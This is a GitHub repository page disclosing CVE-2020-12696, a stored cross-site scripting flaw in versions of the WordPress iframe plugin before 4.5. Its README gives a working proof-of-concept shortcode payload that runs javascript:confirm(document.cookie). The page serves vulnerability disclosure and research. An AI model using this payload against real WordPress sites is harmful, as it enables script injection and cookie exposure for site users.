Skip to content

g-rubert/CVE-2020-12696

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits

README.md

README.md

 
 

Repository files navigation

CVE-2020-12696

██╗  ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
 ╚███╔╝ ███████╗███████╗
 ██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝  ╚═╝╚══════╝╚══════╝

Iframe < 4.5 - Authenticated Stored Cross Site Scripting (XSS)

The iframe plugin before 4.5 does not sanitize a URL.

Payload: </b>[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
Version [plugin]: </b>4.4
Tested on: </b>WordPress 5.2.4
Researcher:</b> Guilherme Rubert

References:

https://guilhermerubert.com/blog/cve-2020-12696/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
https://wordpress.org/plugins/iframe/#developers

About

Stored Cross Site Scripting - Iframe Plugin - WordPress

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published